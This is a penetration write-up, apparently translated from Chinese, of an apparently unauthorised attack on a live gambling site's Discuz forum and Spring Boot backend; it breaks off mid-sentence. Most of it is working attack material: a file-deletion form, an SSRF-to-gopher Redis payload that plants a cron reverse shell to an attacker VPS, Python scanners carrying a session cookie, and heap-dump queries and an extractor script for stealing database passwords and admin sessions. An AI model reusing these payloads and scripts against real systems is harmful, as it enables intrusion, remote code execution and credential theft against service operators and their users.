
Title: Penetration of a large gambling ("spinach") site: Duck Neck


When registering on the main site you can see .jsp and .php suffixes coexisting; presumably different routes are reverse-proxied to different middleware. No vulnerabilities were found there.


The forum is Discuz! X3.2


The Discuz first-aid kit (急救箱) was found.


admin.php returns 403; uc_server and the first-aid kit have no weak passwords.

In 《渗透某盗版游戏网站》 (Penetrating a pirated-game website) I covered the vulnerabilities in the Discuz admin backend, so what about the front end? Mainly there are arbitrary file deletion, SSRF, and uc_server brute-forcing.

First, arbitrary file deletion.

POST /home.php?mod=spacecp&ac=profile&op=base

birthprovince=./././info.php

Then POST the form with a file field to delete info.php:

<form action='https://x.com/home.php?mod=spacecp&ac=profile&op=base' method='POST' enctype='multipart/form-data'>
<input type='file' name='birthprovince' id='file'/>
<input type='text' name='formhash' value='017b5107'/>
<input type='text' name='profilesubmit' value='1'/>
<input type='submit' value='Submit'/>
</form>

Although this vulnerability is not low severity, it is useless for the rest of the penetration: forcing a Discuz reinstall by deleting files is difficult.

Next, the SSRF.

/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://qzf9jq.dnslog.cn/1.png[/img]&formhash=017b5107

This SSRF has no echo; it can only be judged by response delay.

1. Intranet hosts can be detected directly over http: if the IP is alive there is a short delay (regardless of whether the port is open), and if the IP does not exist there is a long delay.

2. The protocol can be switched via a 302 redirect; ftp, dict and gopher are supported.

3. Ports can be detected via the ftp protocol: an open port gives a long delay and a closed port a short delay.

First, hit my VPS over http to get the forum's real IP.

163.*. *.35.bc.googleusercontent.com(35.*.*.163)

Then try blindly hitting the local Redis (probing local ports here is impractical, so I simply fired blind).

When attacking local Redis over gopher, I found that you do not need to declare each command line's length with $.

First, the clear-text SSRF payload:

/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://62.1.1.1/302.php?s=gopher&ip=127.0.0.1&port=6379&data=_flushall%0d%0aconfig set dir /var/spool/cron/%0d%0aconfig set dbfilename root%0d%0aset 0 "\n\n*/1 * * * * bash -i >& /dev/tcp/62.1.1.1/5667 0>&1\n\n"%0d%0asave%0d%0aquit%0d%0a&xx=1.png[/img]&formhash=017b5107

Then the part between 302.php? and data= has to be URL-encoded once (the & separators become %26 so that Discuz's own query parser does not split them), and everything from data= up to xx=1.png has to be encoded twice (once for the $_GET decoding in 302.php and once more for the outer request), and the whole thing is then sent from Burp.

/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://62.1.1.1/302.php?s=gopher%26ip=127.0.0.1%26port=6379%26data=%25%35%66%25%36%36%25%36%63%25%37%35%25%37%33%25%36%38%25%36%31%25%36%63%25%36%63...xx=1.png[/img]&formhash=017b5107

(Double-encoded data shown truncated: %25%35%66 decodes to %5f and then to the leading _ of _flushall.)

But the payload was caught by Discuz's built-in XSS/SQL-injection filter.

So the payload has to live on the VPS instead.

<?php
$ip     = $_GET['ip'];
$port   = $_GET['port'];
$scheme = $_GET['s'];
// Once-encoded Redis inline commands; the gopher client decodes %0d%0a to CRLF.
// The leading _ is the gopher item type and is dropped before sending.
$data = '_flushall%0d%0aconfig set dir /var/spool/cron/%0d%0aconfig set dbfilename root%0d%0aset 0 "\n\n*/1 * * * * bash -i >& /dev/tcp/62.1.1.1/5667 0>&1\n\n"%0d%0asave%0d%0aquit%0d%0a';
header("Location: $scheme://$ip:$port/$data");

Test whether Redis on the VPS can be hit:

/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://62.1.1.1/302.php?s=gopher%26ip=62.1.1.1%26port=6379%26data=1.png[/img]&formhash=017b5107

No problem. But exploitation failed in the real environment; the reason is unclear. Possibly there is no Redis, Redis lacks permissions, or it has a password.

I started writing scripts to probe the intranet, without much hope: it is Google Cloud, and there is not necessarily an intranet.

Build a dictionary of candidate intranet IPs:

f = open('ip.txt', 'w')
f.write('127.0.0.1\n')
f.write('localhost\n')
# first host of every 192.168.x.0/24
for i in range(1, 256):
    f.write('192.168.' + str(i) + '.1\n')
# first host of every 172.16-31.x.0/24
for i in range(16, 32):
    for ii in range(1, 256):
        f.write('172.' + str(i) + '.' + str(ii) + '.1\n')
# first host of every 10.x.y.0/24
for i in range(1, 256):
    for ii in range(1, 256):
        f.write('10.' + str(i) + '.' + str(ii) + '.1\n')
f.close()

Then use the delay to find the intranet IP segment. Since the delay for an unreachable IP is over 7s, this has to be multithreaded. Since any protocol will do for detecting whether an IP exists, I simply reused the gopher Redis-attack payload; who knows, it might land.

import requests
import threading

# the author's own forum session and formhash
header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Accept-Encoding': 'gzip,deflate',
    'Connection': 'keep-alive'
}
cookie = {
    'PNuE_2132_saltkey': 'vx3wOD3T',
    'PNuE_2132_auth': '8b46%2F9AD2x2XyfyESVQaytdhS%2FVWrzIGQLWCe3IAr6AIwuX8raGrp%2BgRkMv39ylNO2GAIfHep01AGhxApI0OCyXirNKx'
}

def ssrf(i):
    # 302.php on the VPS redirects the forum to gopher://i:6379/
    url = ('https://x.com/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]'
           'http://62.1.1.1/302.php?s=gopher%26ip=' + i + '%26port=6379%26data=1.png[/img]&formhash=017b5107')
    r = requests.get(url, cookies=cookie, headers=header, allow_redirects=False)
    elapsed = r.elapsed.total_seconds()
    timeout = str(i) + ' port:' + str(elapsed)
    if elapsed > 6:
        # long delay: nothing routes to this IP
        print(timeout)
    else:
        # short delay: the host exists (port state unknown)
        fo = open('openip.txt', 'a')
        fo.write(str(i) + ' open\n')
        fo.close()
        print(str(i) + ' open')
        print(timeout)

def thread(batch):
    name = []
    for i in batch:
        th = threading.Thread(target=ssrf, args=(i,))
        name.append(th)
        th.start()
    for th in name:
        th.join()

# run the dictionary in batches of 21 parallel requests
folist = open('ip.txt', 'r')
batch = []
for i in folist.readlines():
    i = i.replace('\n', '')
    batch.append(i)
    if len(batch) == 21:
        thread(batch)
        batch = []
if batch:
    thread(batch)

Only one open gateway was found, 172.30.2.1, so next enumerate the intranet IPs behind this gateway by replacing ip.txt.


After running for a day, only two intranet IPs came out, 172.30.2.1 and 172.30.2.2. Most likely 172.30.2.2 is the server itself and 172.30.2.1 is the cloud's virtual gateway.

Finally, use the ftp protocol to scan their ports; just adapt the script yourself.

Most hits are false positives; in fact only ports 80 and 443 are open, so unless more intranet IPs turn up later, nothing more is to be expected from the SSRF.
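As an added example, not the author's script, the following Python generalizes the scan above: it builds the same gateway wordlist with the ipaddress module, runs probes through a thread pool, and applies both timing rules (http for host discovery, ftp for port state) from one classify function. The timer is injected so the logic runs offline; for a real run pass a lambda around requests.get as shown in the docstring. TARGET, VPS and FORMHASH are the placeholders from the post, and DEAD_THRESHOLD is an assumption derived from the 7s figure above.

```python
import ipaddress
from concurrent.futures import ThreadPoolExecutor

# Constructed placeholders taken from the post; replace with your own values.
TARGET = "https://x.com"
VPS = "62.1.1.1"
FORMHASH = "017b5107"
DEAD_THRESHOLD = 6.0   # seconds; unreachable IPs took >7s in the post (assumption)


def candidate_gateways():
    """First host of every /24 in the RFC 1918 ranges, plus loopback: the same
    wordlist the post builds, generated from the network objects."""
    targets = ["127.0.0.1"]
    for net in ("192.168.0.0/16", "172.16.0.0/12", "10.0.0.0/8"):
        n = ipaddress.ip_network(net)
        for base in range(int(n.network_address), int(n.broadcast_address), 256):
            targets.append(str(ipaddress.ip_address(base + 1)))
    return targets


def probe_url(ip, port, scheme):
    """Outer downremoteimg request. The forum fetches VPS/302.php, which 302s to
    scheme://ip:port/ so the forum's own client makes the connection; only the
    '&' inside the inner URL needs encoding (%26), as in the post."""
    inner = f"http://{VPS}/302.php?s={scheme}&ip={ip}&port={port}&data=&xx=1.png"
    msg = f"[img=1,1]{inner.replace('&', '%26')}[/img]"
    return f"{TARGET}/forum.php?mod=ajax&action=downremoteimg&message={msg}&formhash={FORMHASH}"


def classify(elapsed, kind):
    """Map a response time onto the post's two timing rules.
    kind='host' (http probe): short delay = host alive, long = no route.
    kind='port' (ftp probe):  long delay = port open (client waits on the FTP
    banner), short = closed (immediate RST)."""
    long_delay = elapsed > DEAD_THRESHOLD
    if kind == "host":
        return "down" if long_delay else "alive"
    return "open" if long_delay else "closed"


def scan(targets, timer, kind="host", workers=20):
    """targets: IPs (host mode) or (ip, port) tuples (port mode).
    timer(url) -> elapsed seconds. For a live run use
      lambda u: requests.get(u, cookies=COOKIE, headers=HEADERS,
                             allow_redirects=False).elapsed.total_seconds()
    Returns {target: verdict}."""
    scheme = "ftp" if kind == "port" else "http"

    def one(t):
        ip, port = t if kind == "port" else (t, 80)
        return t, classify(timer(probe_url(ip, port, scheme)), kind)

    with ThreadPoolExecutor(max_workers=workers) as ex:
        return dict(ex.map(one, targets))


def alive_hosts(targets, timer, workers=20):
    """Sorted list of hosts that answered quickly in host mode."""
    return sorted(ip for ip, v in scan(targets, timer, "host", workers).items()
                  if v == "alive")
```

Two things the post's script does not do: the thread pool keeps a fixed number of requests in flight instead of batches that wait for the slowest member, and the port mode inverts the verdict, which is easy to get backwards when reusing host-discovery code for ftp probes.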

The last item, uc_server brute-forcing, works by changing the XFF header so that the image captcha stays fixed; the attempt failed. For details see https://www.freebuf.com/articles/web/197546.html

The forum is done; let's see what is wrong with the customer service system.

/res/image.html?id=upload/6c825ed7ea4cd25657288ab4f7d0227f

The id parameter is passed through but directory traversal is not possible, and file upload cannot be exploited, so start directory scanning.

The admin login page has slider verification, but it is only front-end theatre with no back-end check; brute-forcing it was still fruitless.

Seeing /actuator tells you it is Spring Boot, so brute-force with a targeted dictionary.

/swagger-ui.html is empty, /env redirects to admin, /heapdump is 403.

But with nothing else to try, /heapdump.json worked.

Unzip the roughly 1 GB memory dump, open it in Memory Analyzer (MAT), and query it with OQL.

Without /env to cross-reference, I could only dig for configuration blind. Here are some tips I worked out.

SELECT * FROM org.springframework.web.context.support.StandardServletEnvironment

Check the configuration; sorting by Retained Heap (size) makes this more convenient.

SELECT * FROM java.lang.String s WHERE toString(s) LIKE '.*password.*'

Check strings containing password. This way it is not easy to find the associated class, but you can quickly find login records and the like. Replace password with http:// to find some URLs.

SELECT * FROM java.util.Hashtable$Entry x WHERE toString(x.key).contains('username')
SELECT * FROM java.util.Hashtable$Entry x WHERE toString(x.key).contains('password')
SELECT * FROM java.util.Hashtable$Entry x WHERE toString(x.key).contains('url')

Quickly check database-related information; this found the MySQL address, account and password. Unfortunately Amazon's database has an IP whitelist by default and cannot be logged into remotely.

SELECT * FROM java.lang.String s WHERE toString(s) LIKE '.*SESSION.*'

Found a logged-in session; replace it and log into the backend.
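An added example (mine, not from the post) for the same hunting step without MAT: a byte-level scanner over the raw .hprof that pulls out the password, jdbc:, http:// and SESSION strings in both layouts Java uses, Latin-1 byte[] (Java 9+ compact strings) and big-endian UTF-16 char[] (Java 8), which is why a plain `strings` run can miss half of them. The pattern list and the context limit are assumptions; MAT's OQL remains the better tool for tying a value back to the object that owns it.

```python
import mmap
import re
import sys

# Byte patterns worth pulling out of a Spring Boot heap dump (assumed list).
PATTERNS = [rb"password", rb"jdbc:", rb"http://", rb"https://", rb"SESSION"]
PRINTABLE = frozenset(range(0x20, 0x7F))


def _utf16(pattern):
    """Interleave NULs so an ASCII pattern also matches UTF-16BE char[] data."""
    return b"".join(b"\x00" + bytes([c]) for c in pattern)


def _run_latin1(blob, start, end, limit):
    """Grow a hit outwards over printable bytes (compact strings, byte[] buffers)."""
    lo, hi = start, end
    while lo > 0 and blob[lo - 1] in PRINTABLE and start - lo < limit:
        lo -= 1
    while hi < len(blob) and blob[hi] in PRINTABLE and hi - end < limit:
        hi += 1
    return blob[lo:hi].decode("latin-1")


def _run_utf16(blob, start, end, limit):
    """Grow a hit outwards over NUL+printable pairs (Java 8 char[] in HPROF
    primitive-array dumps, which are stored big-endian)."""
    lo, hi = start, end
    while lo >= 2 and blob[lo - 2] == 0 and blob[lo - 1] in PRINTABLE and start - lo < limit:
        lo -= 2
    while hi + 1 < len(blob) and blob[hi] == 0 and blob[hi + 1] in PRINTABLE and hi - end < limit:
        hi += 2
    return blob[lo:hi].decode("utf-16-be")


def heap_strings(blob, patterns=PATTERNS, context=200):
    """Return sorted (offset, encoding, text) for every pattern hit in a raw
    .hprof blob, in both string layouts, one entry per distinct run."""
    best = {}
    for pat in patterns:
        for m in re.finditer(re.escape(pat), blob, re.IGNORECASE):
            key = ("latin1", _run_latin1(blob, m.start(), m.end(), context))
            best[key] = min(best.get(key, m.start()), m.start())
        for m in re.finditer(re.escape(_utf16(pat)), blob, re.IGNORECASE):
            key = ("utf16", _run_utf16(blob, m.start(), m.end(), context))
            best[key] = min(best.get(key, m.start()), m.start())
    return sorted((off, enc, text) for (enc, text), off in best.items())


if __name__ == "__main__":
    # Usage: python heap_strings.py heapdump.hprof   (mmap keeps a 1 GB file off the heap)
    with open(sys.argv[1], "rb") as f, mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ) as mm:
        for off, enc, text in heap_strings(mm):
            print(f"{off:#x} {enc} {text}")
```

Because the run is grown outwards from the hit, a match on password usually comes back with its key (spring.datasource.password=...) attached, which is what makes the output greppable without a second pass.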


The backend uses WSS (WebSocket over TLS) for real-time chat, and there are no exploitable points in the avatar or the customer-service reply. Only some wailing from gamblers was found.

The black-box test was fruitless. I searched GitHub for distinctive class names from the heapdump and found a copy of source code that might be the initial version; the target was a modified revision, and the source was not very complete.

Auditing the incomplete code turned up an arbitrary file read and an SSRF.

With some source in hand, you know where the configuration file is and can read it.

Get the database configuration, of course before
